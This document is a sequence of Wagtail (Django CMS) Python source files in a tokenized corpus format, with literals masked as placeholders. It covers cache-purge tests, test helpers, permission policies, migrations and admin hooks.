<s> from __future__ import absolute_import , unicode_literals <EOL> from django . test import TestCase <EOL> from django . test . utils import override_settings <EOL> from wagtail . contrib . wagtailfrontendcache . backends import ( <EOL> BaseBackend , CloudflareBackend , HTTPBackend ) <EOL> from wagtail . contrib . wagtailfrontendcache . utils import get_backends <EOL> from wagtail . tests . testapp . models import EventIndex <EOL> from wagtail . wagtailcore . models import Page <EOL> class TestBackendConfiguration ( TestCase ) : <EOL> def test_default ( self ) : <EOL> backends = get_backends ( ) <EOL> self . assertEqual ( len ( backends ) , <NUM_LIT:0> ) <EOL> def test_varnish ( self ) : <EOL> backends = get_backends ( backend_settings = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . assertEqual ( set ( backends . keys ( ) ) , set ( [ '<STR_LIT>' ] ) ) <EOL> self . assertIsInstance ( backends [ '<STR_LIT>' ] , HTTPBackend ) <EOL> self . assertEqual ( backends [ '<STR_LIT>' ] . cache_scheme , '<STR_LIT:http>' ) <EOL> self . assertEqual ( backends [ '<STR_LIT>' ] . cache_netloc , '<STR_LIT>' ) <EOL> def test_cloudflare ( self ) : <EOL> backends = get_backends ( backend_settings = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . assertEqual ( set ( backends . keys ( ) ) , set ( [ '<STR_LIT>' ] ) ) <EOL> self . assertIsInstance ( backends [ '<STR_LIT>' ] , CloudflareBackend ) <EOL> self . assertEqual ( backends [ '<STR_LIT>' ] . cloudflare_email , '<STR_LIT>' ) <EOL> self . assertEqual ( backends [ '<STR_LIT>' ] . 
cloudflare_token , '<STR_LIT>' ) <EOL> def test_multiple ( self ) : <EOL> backends = get_backends ( backend_settings = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } ) <EOL> self . assertEqual ( set ( backends . keys ( ) ) , set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> def test_filter ( self ) : <EOL> backends = get_backends ( backend_settings = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } , backends = [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( set ( backends . keys ( ) ) , set ( [ '<STR_LIT>' ] ) ) <EOL> @ override_settings ( WAGTAILFRONTENDCACHE_LOCATION = '<STR_LIT>' ) <EOL> def test_backwards_compatibility ( self ) : <EOL> backends = get_backends ( ) <EOL> self . assertEqual ( set ( backends . keys ( ) ) , set ( [ '<STR_LIT:default>' ] ) ) <EOL> self . assertIsInstance ( backends [ '<STR_LIT:default>' ] , HTTPBackend ) <EOL> self . assertEqual ( backends [ '<STR_LIT:default>' ] . cache_scheme , '<STR_LIT:http>' ) <EOL> self . assertEqual ( backends [ '<STR_LIT:default>' ] . cache_netloc , '<STR_LIT>' ) <EOL> PURGED_URLS = [ ] <EOL> class MockBackend ( BaseBackend ) : <EOL> def __init__ ( self , config ) : <EOL> pass <EOL> def purge ( self , url ) : <EOL> PURGED_URLS . append ( url ) <EOL> @ override_settings ( WAGTAILFRONTENDCACHE = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> class TestCachePurging ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def test_purge_on_publish ( self ) : <EOL> PURGED_URLS [ : ] = [ ] <EOL> page = EventIndex . objects . get ( url_path = '<STR_LIT>' ) <EOL> page . save_revision ( ) . 
publish ( ) <EOL> self . assertEqual ( PURGED_URLS , [ '<STR_LIT>' ] ) <EOL> def test_purge_on_unpublish ( self ) : <EOL> PURGED_URLS [ : ] = [ ] <EOL> page = EventIndex . objects . get ( url_path = '<STR_LIT>' ) <EOL> page . unpublish ( ) <EOL> self . assertEqual ( PURGED_URLS , [ '<STR_LIT>' ] ) <EOL> def test_purge_with_unroutable_page ( self ) : <EOL> PURGED_URLS [ : ] = [ ] <EOL> root = Page . objects . get ( url_path = '<STR_LIT:/>' ) <EOL> page = EventIndex ( title = '<STR_LIT>' ) <EOL> root . add_child ( instance = page ) <EOL> page . save_revision ( ) . publish ( ) <EOL> self . assertEqual ( PURGED_URLS , [ ] ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . core . urlresolvers import reverse <EOL> from django . test import TestCase <EOL> from wagtail . tests . utils import WagtailTestUtils <EOL> class TestStyleGuide ( TestCase , WagtailTestUtils ) : <EOL> def setUp ( self ) : <EOL> self . login ( ) <EOL> def test_styleguide ( self ) : <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertTemplateUsed ( response , '<STR_LIT>' ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . http import HttpResponse <EOL> from wagtail . contrib . wagtailroutablepage . models import RoutablePage , route <EOL> def routable_page_external_view ( request , arg = "<STR_LIT>" ) : <EOL> return HttpResponse ( "<STR_LIT>" + arg ) <EOL> class RoutablePageTest ( RoutablePage ) : <EOL> @ route ( r'<STR_LIT>' ) <EOL> def main ( self , request ) : <EOL> return HttpResponse ( "<STR_LIT>" ) <EOL> @ route ( r'<STR_LIT>' ) <EOL> def archive_by_year ( self , request , year ) : <EOL> return HttpResponse ( "<STR_LIT>" + str ( year ) ) <EOL> @ route ( r'<STR_LIT>' ) <EOL> def archive_by_author ( self , request , author_slug ) : <EOL> return HttpResponse ( "<STR_LIT>" + author_slug ) <EOL> @ route ( r'<STR_LIT>' ) <EOL> @ route ( r'<STR_LIT>' ) <EOL> def external_view ( self , * args , ** kwargs ) : <EOL> return routable_page_external_view ( * args , ** kwargs ) <EOL> @ route ( r'<STR_LIT>' , name = '<STR_LIT>' ) <EOL> def override_name_test ( self , request ) : <EOL> pass </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import sys <EOL> import warnings <EOL> from contextlib import contextmanager <EOL> import django <EOL> from django . contrib . auth import get_user_model <EOL> from django . core . urlresolvers import reverse <EOL> from django . test import TestCase <EOL> from django . utils import six <EOL> from django . utils . text import slugify <EOL> class WagtailTestUtils ( object ) : <EOL> @ staticmethod <EOL> def create_test_user ( ) : <EOL> """<STR_LIT>""" <EOL> user_model = get_user_model ( ) <EOL> user_data = dict ( ) <EOL> user_data [ user_model . USERNAME_FIELD ] = '<STR_LIT>' <EOL> user_data [ '<STR_LIT:password>' ] = '<STR_LIT:password>' <EOL> for field in user_model . REQUIRED_FIELDS : <EOL> user_data [ field ] = field <EOL> return user_model . objects . create_superuser ( ** user_data ) <EOL> def login ( self ) : <EOL> user = self . create_test_user ( ) <EOL> user_model = get_user_model ( ) <EOL> self . assertTrue ( <EOL> self . client . login ( password = '<STR_LIT:password>' , ** { user_model . USERNAME_FIELD : '<STR_LIT>' } ) <EOL> ) <EOL> return user <EOL> def assertRegex ( self , * args , ** kwargs ) : <EOL> six . assertRegex ( self , * args , ** kwargs ) <EOL> @ staticmethod <EOL> @ contextmanager <EOL> def ignore_deprecation_warnings ( ) : <EOL> with warnings . catch_warnings ( record = True ) as warning_list : <EOL> yield <EOL> for w in warning_list : <EOL> if not issubclass ( w . category , ( DeprecationWarning , PendingDeprecationWarning ) ) : <EOL> warnings . showwarning ( <EOL> message = w . message , <EOL> category = w . category , <EOL> filename = w . filename , <EOL> lineno = w . lineno , <EOL> file = w . file , <EOL> line = w . line <EOL> ) <EOL> @ staticmethod <EOL> def reset_warning_registry ( ) : <EOL> """<STR_LIT>""" <EOL> key = "<STR_LIT>" <EOL> for mod in list ( sys . modules . values ( ) ) : <EOL> if hasattr ( mod , key ) : <EOL> getattr ( mod , key ) . 
clear ( ) <EOL> class WagtailPageTests ( WagtailTestUtils , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( WagtailPageTests , self ) . setUp ( ) <EOL> self . login ( ) <EOL> def _testCanCreateAt ( self , parent_model , child_model ) : <EOL> return child_model in parent_model . allowed_subpage_models ( ) <EOL> def assertCanCreateAt ( self , parent_model , child_model , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if not self . _testCanCreateAt ( parent_model , child_model ) : <EOL> msg = self . _formatMessage ( msg , "<STR_LIT>" % ( <EOL> child_model . _meta . app_label , child_model . _meta . model_name , <EOL> parent_model . _meta . app_label , parent_model . _meta . model_name ) ) <EOL> raise self . failureException ( msg ) <EOL> def assertCanNotCreateAt ( self , parent_model , child_model , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if self . _testCanCreateAt ( parent_model , child_model ) : <EOL> msg = self . _formatMessage ( msg , "<STR_LIT>" % ( <EOL> child_model . _meta . app_label , child_model . _meta . model_name , <EOL> parent_model . _meta . app_label , parent_model . _meta . model_name ) ) <EOL> raise self . failureException ( msg ) <EOL> def assertCanCreate ( self , parent , child_model , data , msg = None ) : <EOL> """<STR_LIT>""" <EOL> self . assertCanCreateAt ( parent . specific_class , child_model ) <EOL> if '<STR_LIT>' not in data and '<STR_LIT:title>' in data : <EOL> data [ '<STR_LIT>' ] = slugify ( data [ '<STR_LIT:title>' ] ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> add_url = reverse ( '<STR_LIT>' , args = [ <EOL> child_model . _meta . app_label , child_model . _meta . model_name , parent . pk ] ) <EOL> response = self . client . post ( add_url , data , follow = True ) <EOL> if response . status_code != <NUM_LIT:200> : <EOL> msg = self . _formatMessage ( msg , '<STR_LIT>' % ( <EOL> child_model . _meta . app_label , child_model . _meta . model_name , response . status_code ) ) <EOL> raise self . 
failureException ( msg ) <EOL> if response . redirect_chain == [ ] : <EOL> if '<STR_LIT>' not in response . context : <EOL> msg = self . _formatMessage ( msg , '<STR_LIT>' ) <EOL> raise self . failureException ( msg ) <EOL> form = response . context [ '<STR_LIT>' ] <EOL> if not form . errors : <EOL> msg = self . _formatMessage ( msg , '<STR_LIT>' ) <EOL> raise self . failureException ( msg ) <EOL> errors = '<STR_LIT:\n>' . join ( '<STR_LIT>' % ( field , '<STR_LIT>' . join ( errors ) ) <EOL> for field , errors in sorted ( form . errors . items ( ) ) ) <EOL> msg = self . _formatMessage ( msg , '<STR_LIT>' % ( <EOL> child_model . _meta . app_label , child_model . _meta . model_name , errors ) ) <EOL> raise self . failureException ( msg ) <EOL> if django . VERSION >= ( <NUM_LIT:1> , <NUM_LIT:9> ) : <EOL> explore_url = reverse ( '<STR_LIT>' , args = [ parent . pk ] ) <EOL> else : <EOL> explore_url = '<STR_LIT>' + reverse ( '<STR_LIT>' , args = [ parent . pk ] ) <EOL> if response . redirect_chain != [ ( explore_url , <NUM_LIT> ) ] : <EOL> msg = self . _formatMessage ( msg , '<STR_LIT>' % ( <EOL> child_model . _meta . app_label , child_model . _meta . model_name , <EOL> response . redirect_chain ) ) <EOL> raise self . failureException ( msg ) <EOL> def assertAllowedSubpageTypes ( self , parent_model , child_models , msg = None ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> set ( parent_model . allowed_subpage_models ( ) ) , <EOL> set ( child_models ) , <EOL> msg = msg ) <EOL> def assertAllowedParentPageTypes ( self , child_model , parent_models , msg = None ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> set ( child_model . allowed_parent_page_models ( ) ) , <EOL> set ( parent_models ) , <EOL> msg = msg ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import hashlib <EOL> from django import template <EOL> from django . utils . six . moves . urllib . parse import urlencode <EOL> register = template . Library ( ) <EOL> class GravatarUrlNode ( template . Node ) : <EOL> def __init__ ( self , email , size = <NUM_LIT:50> ) : <EOL> self . email = template . Variable ( email ) <EOL> self . size = size <EOL> def render ( self , context ) : <EOL> try : <EOL> email = self . email . resolve ( context ) <EOL> except template . VariableDoesNotExist : <EOL> return '<STR_LIT>' <EOL> default = "<STR_LIT:blank>" <EOL> size = int ( self . size ) * <NUM_LIT:2> <EOL> gravatar_url = "<STR_LIT>" . format ( <EOL> hash = hashlib . md5 ( email . lower ( ) . encode ( '<STR_LIT:utf-8>' ) ) . hexdigest ( ) , <EOL> params = urlencode ( { '<STR_LIT:s>' : size , '<STR_LIT:d>' : default } ) <EOL> ) <EOL> return gravatar_url <EOL> @ register . tag <EOL> def gravatar_url ( parser , token ) : <EOL> bits = token . split_contents ( ) <EOL> return GravatarUrlNode ( * bits [ <NUM_LIT:1> : ] ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . http import JsonResponse <EOL> from taggit . models import Tag <EOL> def autocomplete ( request ) : <EOL> term = request . GET . get ( '<STR_LIT>' , None ) <EOL> if term : <EOL> tags = Tag . objects . filter ( name__istartswith = term ) . order_by ( '<STR_LIT:name>' ) <EOL> else : <EOL> tags = Tag . objects . none ( ) <EOL> return JsonResponse ( [ tag . name for tag in tags ] , safe = False ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( <EOL> max_length = <NUM_LIT:20> , <EOL> choices = [ <EOL> ( b'<STR_LIT>' , b'<STR_LIT>' ) , <EOL> ( b'<STR_LIT>' , b'<STR_LIT>' ) , <EOL> ( b'<STR_LIT>' , b'<STR_LIT>' ) <EOL> ] <EOL> ) , <EOL> ) , <EOL> migrations . AlterUniqueTogether ( <EOL> name = '<STR_LIT>' , <EOL> unique_together = set ( [ ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . contrib . auth import get_user_model <EOL> from django . contrib . auth . models import Permission <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . core . exceptions import FieldDoesNotExist , ImproperlyConfigured <EOL> from django . db . models import Q <EOL> from django . utils . functional import cached_property <EOL> class BasePermissionPolicy ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model ) : <EOL> self . model = model <EOL> def user_has_permission ( self , user , action ) : <EOL> """<STR_LIT>""" <EOL> return ( user in self . users_with_permission ( action ) ) <EOL> def user_has_any_permission ( self , user , actions ) : <EOL> """<STR_LIT>""" <EOL> return any ( self . user_has_permission ( user , action ) for action in actions ) <EOL> def users_with_any_permission ( self , actions ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def users_with_permission ( self , action ) : <EOL> """<STR_LIT>""" <EOL> return self . users_with_any_permission ( [ action ] ) <EOL> def user_has_permission_for_instance ( self , user , action , instance ) : <EOL> """<STR_LIT>""" <EOL> return self . user_has_permission ( user , action ) <EOL> def user_has_any_permission_for_instance ( self , user , actions , instance ) : <EOL> """<STR_LIT>""" <EOL> return any ( <EOL> self . user_has_permission_for_instance ( user , action , instance ) <EOL> for action in actions <EOL> ) <EOL> def instances_user_has_any_permission_for ( self , user , actions ) : <EOL> """<STR_LIT>""" <EOL> if self . user_has_any_permission ( user , actions ) : <EOL> return self . model . objects . all ( ) <EOL> else : <EOL> return self . model . objects . none ( ) <EOL> def instances_user_has_permission_for ( self , user , action ) : <EOL> """<STR_LIT>""" <EOL> return self . 
instances_user_has_any_permission_for(user, [action])  # NOTE(review): continuation of a statement begun before this chunk

    def users_with_any_permission_for_instance(self, actions, instance):
        """<STR_LIT>"""
        # Base implementation ignores the instance and falls back to the
        # model-wide permission check.
        return self.users_with_any_permission(actions)

    def users_with_permission_for_instance(self, action, instance):
        # Single-action convenience wrapper around the plural form.
        return self.users_with_any_permission_for_instance([action], instance)


class BlanketPermissionPolicy(BasePermissionPolicy):
    """<STR_LIT>"""
    # Grants every action to every user, authenticated or not.

    def user_has_permission(self, user, action):
        return True

    def user_has_any_permission(self, user, actions):
        return True

    def users_with_any_permission(self, actions):
        # Every active user qualifies.
        return get_user_model().objects.filter(is_active=True)

    def users_with_permission(self, action):
        return get_user_model().objects.filter(is_active=True)


class AuthenticationOnlyPermissionPolicy(BasePermissionPolicy):
    """<STR_LIT>"""
    # Grants every action to any active, authenticated user.
    # NOTE(review): is_authenticated is called as a method here, which
    # assumes an older Django version (it became a property later) — confirm.

    def user_has_permission(self, user, action):
        return user.is_authenticated() and user.is_active

    def user_has_any_permission(self, user, actions):
        return user.is_authenticated() and user.is_active

    def users_with_any_permission(self, actions):
        return get_user_model().objects.filter(is_active=True)

    def users_with_permission(self, action):
        return get_user_model().objects.filter(is_active=True)


class BaseDjangoAuthPermissionPolicy(BasePermissionPolicy):
    """<STR_LIT>"""

    def __init__(self, model, auth_model=None):
        # auth_model is the model the django.contrib.auth permission records
        # are attached to; defaults to the policy's own model.
        super(BaseDjangoAuthPermissionPolicy, self).__init__(model)
        self.auth_model = auth_model or self.model
        self.app_label = self.auth_model._meta.app_label
        self.model_name = self.auth_model._meta.model_name

    @cached_property
    def _content_type(self):
        # Cached: ContentType lookups hit the database.
        return ContentType.objects.get_for_model(self.auth_model)

    def _get_permission_name(self, action):
        """<STR_LIT>"""
        return '<STR_LIT>' % (self.app_label, action, self.model_name)

    def _get_users_with_any_permission_codenames_filter(self, permission_codenames):
        """<STR_LIT>"""
        permissions = Permission.objects.filter(
            content_type=self._content_type,
            codename__in=permission_codenames
        )
        # Superusers always match; others match through a direct user
        # permission or a group permission. Inactive users never match.
        return (
            Q(is_superuser=True) |
            Q(user_permissions__in=permissions) |
            Q(groups__permissions__in=permissions)
        ) & Q(is_active=True)

    def _get_users_with_any_permission_codenames(self, permission_codenames):
        """<STR_LIT>"""
        filter_expr = self._get_users_with_any_permission_codenames_filter(permission_codenames)
        # distinct() because the permission joins can yield duplicate rows.
        return get_user_model().objects.filter(filter_expr).distinct()


class ModelPermissionPolicy(BaseDjangoAuthPermissionPolicy):
    """<STR_LIT>"""

    def user_has_permission(self, user, action):
        return user.has_perm(self._get_permission_name(action))

    def users_with_any_permission(self, actions):
        # Build one codename per requested action and query them together.
        permission_codenames = [
            '<STR_LIT>' % (action, self.model_name)
            for action in actions
        ]
        return self._get_users_with_any_permission_codenames(permission_codenames)


class OwnershipPermissionPolicy(BaseDjangoAuthPermissionPolicy):
    """<STR_LIT>"""

    def __init__(self, model, auth_model=None, owner_field_name='<STR_LIT>'):
        super(OwnershipPermissionPolicy, self).__init__(model, auth_model=auth_model)
        self.owner_field_name = owner_field_name
        # Fail fast at configuration time if the owner field is missing.
        try:
            self.model._meta.get_field(self.owner_field_name)
        except FieldDoesNotExist:
            raise ImproperlyConfigured(
                "<STR_LIT>"
                "<STR_LIT>"
                % (self.model, self.owner_field_name)
            )

    def user_has_permission(self, user, action):
        if action == '<STR_LIT>':
            return user.has_perm(self._get_permission_name('<STR_LIT>'))
        elif action == '<STR_LIT>' or action == '<STR_LIT>':
            # Either of the two permissions grants these actions in general;
            # per-instance ownership is checked separately below.
            return (
                user.has_perm(self._get_permission_name('<STR_LIT>')) or
                user.has_perm(self._get_permission_name('<STR_LIT>'))
            )
        else:
            # Any other action is reserved for active superusers.
            return user.is_active and user.is_superuser

    def users_with_any_permission(self, actions):
        if '<STR_LIT>' in actions or '<STR_LIT>' in actions:
            permission_codenames = [
                '<STR_LIT>' % self.model_name,
                '<STR_LIT>' % self.model_name
            ]
        elif '<STR_LIT>' in actions:
            permission_codenames = [
                '<STR_LIT>' % self.model_name,
            ]
        else:
            # Unknown actions: only active superusers qualify.
            return get_user_model().objects.filter(is_active=True, is_superuser=True)
        return self._get_users_with_any_permission_codenames(permission_codenames)

    def user_has_permission_for_instance(self, user, action, instance):
        return self.user_has_any_permission_for_instance(user, [action], instance)

    def user_has_any_permission_for_instance(self, user, actions, instance):
        if '<STR_LIT>' in actions or '<STR_LIT>' in actions:
            if user.has_perm(self._get_permission_name('<STR_LIT>')):
                return True
            elif (
                user.has_perm(self._get_permission_name('<STR_LIT>')) and
                getattr(instance, self.owner_field_name) == user
            ):
                # Holders of the weaker permission may act only on
                # instances they own.
                return True
            else:
                return False
        else:
            return user.is_active and user.is_superuser

    def instances_user_has_any_permission_for(self, user, actions):
        if user.is_active and user.is_superuser:
            return self.model.objects.all()
        elif '<STR_LIT>' in actions or '<STR_LIT>' in actions:
            if user.has_perm(self._get_permission_name('<STR_LIT>')):
                return self.model.objects.all()
            elif user.has_perm(self._get_permission_name('<STR_LIT>')):
                # Restrict to instances owned by this user.
                return self.model.objects.filter(**{self.owner_field_name: user})
            else:
                return self.model.objects.none()
        else:
            return self.model.objects.none()

    def users_with_any_permission_for_instance(self, actions, instance):
        if '<STR_LIT>' in actions or '<STR_LIT>' in actions:
            filter_expr = self._get_users_with_any_permission_codenames_filter([
                '<STR_LIT>' % self.model_name
            ])
            # The instance's owner also qualifies, provided they hold the
            # required permission themselves.
            owner = getattr(instance, self.owner_field_name)
            if owner is not None and owner.has_perm(self._get_permission_name('<STR_LIT>')):
                filter_expr = filter_expr | Q(pk=owner.pk)
            return get_user_model().objects.filter(filter_expr).distinct()
        else:
            return get_user_model().objects.filter(is_active=True, is_superuser=True)
<s> from __future__ import absolute_import , unicode_literals <EOL> import re <EOL> import unicodedata <EOL> from django . apps import apps <EOL> from django . conf import settings <EOL> from django . db . models import Model <EOL> from django . utils . encoding import force_text <EOL> from django . utils . six import string_types <EOL> from django . utils . text import slugify <EOL> WAGTAIL_APPEND_SLASH = getattr ( settings , '<STR_LIT>' , True ) <EOL> def camelcase_to_underscore ( str ) : <EOL> return re . sub ( '<STR_LIT>' , '<STR_LIT>' , str ) . lower ( ) . strip ( '<STR_LIT:_>' ) <EOL> def resolve_model_string ( model_string , default_app = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( model_string , string_types ) : <EOL> try : <EOL> app_label , model_name = model_string . split ( "<STR_LIT:.>" ) <EOL> except ValueError : <EOL> if default_app is not None : <EOL> app_label = default_app <EOL> model_name = model_string <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> model_string ) , model_string ) <EOL> return apps . get_model ( app_label , model_name ) <EOL> elif isinstance ( model_string , type ) and issubclass ( model_string , Model ) : <EOL> return model_string <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" . format ( model_string ) , model_string ) <EOL> SCRIPT_RE = re . compile ( r'<STR_LIT>' ) <EOL> def escape_script ( text ) : <EOL> """<STR_LIT>""" <EOL> return SCRIPT_RE . sub ( r'<STR_LIT>' , text ) <EOL> SLUGIFY_RE = re . compile ( r'<STR_LIT>' , re . UNICODE ) <EOL> def cautious_slugify ( value ) : <EOL> """<STR_LIT>""" <EOL> value = force_text ( value ) <EOL> value = unicodedata . normalize ( '<STR_LIT>' , value ) <EOL> value = SLUGIFY_RE . sub ( '<STR_LIT>' , value ) <EOL> value = value . encode ( '<STR_LIT:ascii>' , '<STR_LIT>' ) . decode ( '<STR_LIT:ascii>' ) <EOL> return slugify ( value ) </s>
from __future__ import absolute_import, unicode_literals

from django.conf.urls import include, url
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.core import urlresolvers
from django.utils.html import format_html, format_html_join
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext

from wagtail.wagtailadmin.menu import MenuItem
from wagtail.wagtailadmin.search import SearchArea
from wagtail.wagtailadmin.site_summary import SummaryItem
from wagtail.wagtailcore import hooks
from wagtail.wagtaildocs import admin_urls
from wagtail.wagtaildocs.forms import GroupDocumentPermissionFormSet
from wagtail.wagtaildocs.models import get_document_model
from wagtail.wagtaildocs.permissions import permission_policy
from wagtail.wagtaildocs.rich_text import DocumentLinkHandler


@hooks.register('<STR_LIT>')
def register_admin_urls():
    # Mount the documents admin URLconf under its own namespace.
    return [
        url(r'<STR_LIT>', include(admin_urls, app_name='<STR_LIT>', namespace='<STR_LIT>')),
    ]


class DocumentsMenuItem(MenuItem):
    def is_shown(self, request):
        # Show the menu entry only to users holding at least one of the
        # relevant document permissions.
        return permission_policy.user_has_any_permission(
            request.user, ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>']
        )


@hooks.register('<STR_LIT>')
def register_documents_menu_item():
    return DocumentsMenuItem(
        _('<STR_LIT>'),
        urlresolvers.reverse('<STR_LIT>'),
        name='<STR_LIT>',
        classnames='<STR_LIT>',
        order=<NUM_LIT>
    )


@hooks.register('<STR_LIT>')
def editor_js():
    # Emit script tags for the static JS files plus an inline snippet
    # parameterised with a reversed admin URL.
    js_files = [
        static('<STR_LIT>'),
        static('<STR_LIT>'),
    ]
    js_includes = format_html_join(
        '<STR_LIT:\n>', '<STR_LIT>',
        ((filename,) for filename in js_files)
    )
    return js_includes + format_html(
        """<STR_LIT>""",
        urlresolvers.reverse('<STR_LIT>')
    )


@hooks.register('<STR_LIT>')
def register_document_link_handler():
    return ('<STR_LIT>', DocumentLinkHandler)


class DocumentsSummaryItem(SummaryItem):
    # order controls placement among other dashboard summary items.
    order = <NUM_LIT>
    template = '<STR_LIT>'

    def get_context(self):
        # Total document count rendered by the summary template.
        return {
            '<STR_LIT>': get_document_model().objects.count(),
        }


@hooks.register('<STR_LIT>')
def add_documents_summary_item(request, items):
    items.append(DocumentsSummaryItem(request))


class DocsSearchArea(SearchArea):
    def is_shown(self, request):
        # Same permission gate as the menu item above.
        return permission_policy.user_has_any_permission(
            request.user, ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>']
        )


@hooks.register('<STR_LIT>')
def register_documents_search_area():
    return DocsSearchArea(
        _('<STR_LIT>'), urlresolvers.reverse('<STR_LIT>'),
        name='<STR_LIT>',
        classnames='<STR_LIT>',
        order=<NUM_LIT>)


@hooks.register('<STR_LIT>')
def register_document_permissions_panel():
    return GroupDocumentPermissionFormSet


@hooks.register('<STR_LIT>')
def describe_collection_docs(collection):
    # Summarise how many documents live in the collection, with a link to
    # a filtered listing; implicitly returns None when the count is zero.
    docs_count = get_document_model().objects.filter(collection=collection).count()
    if docs_count:
        url = urlresolvers.reverse('<STR_LIT>') + ('<STR_LIT>' % collection.id)
        return {
            '<STR_LIT:count>': docs_count,
            '<STR_LIT>': ungettext(
                "<STR_LIT>",
                "<STR_LIT>",
                docs_count
            ) % {'<STR_LIT:count>': docs_count},
            '<STR_LIT:url>': url,
        }
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterModelOptions ( <EOL> name = '<STR_LIT>' , <EOL> options = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . DateTimeField ( auto_now_add = True , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> import django . db . models . deletion <EOL> from django . conf import settings <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT:image>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( <EOL> on_delete = django . db . models . deletion . SET_NULL , blank = True , editable = False , <EOL> to = settings . AUTH_USER_MODEL , null = True , verbose_name = '<STR_LIT>' <EOL> ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . apps import AppConfig <EOL> class WagtailRedirectsAppConfig ( AppConfig ) : <EOL> name = '<STR_LIT>' <EOL> label = '<STR_LIT>' <EOL> verbose_name = "<STR_LIT>" </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from wagtail . wagtailsearch . backends import get_search_backend <EOL> class SearchableQuerySetMixin ( object ) : <EOL> def search ( self , query_string , fields = None , <EOL> operator = None , order_by_relevance = True , backend = '<STR_LIT:default>' ) : <EOL> """<STR_LIT>""" <EOL> search_backend = get_search_backend ( backend ) <EOL> return search_backend . search ( query_string , self , fields = fields , <EOL> operator = operator , order_by_relevance = order_by_relevance ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . contrib . auth import get_permission_codename <EOL> from wagtail . wagtailsnippets . models import get_snippet_models <EOL> def get_permission_name ( action , model ) : <EOL> return "<STR_LIT>" % ( model . _meta . app_label , get_permission_codename ( action , model . _meta ) ) <EOL> def user_can_edit_snippet_type ( user , model ) : <EOL> """<STR_LIT>""" <EOL> for action in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if user . has_perm ( get_permission_name ( action , model ) ) : <EOL> return True <EOL> return False <EOL> def user_can_edit_snippets ( user ) : <EOL> """<STR_LIT>""" <EOL> snippet_models = get_snippet_models ( ) <EOL> for model in snippet_models : <EOL> if user_can_edit_snippet_type ( user , model ) : <EOL> return True <EOL> return False </s>
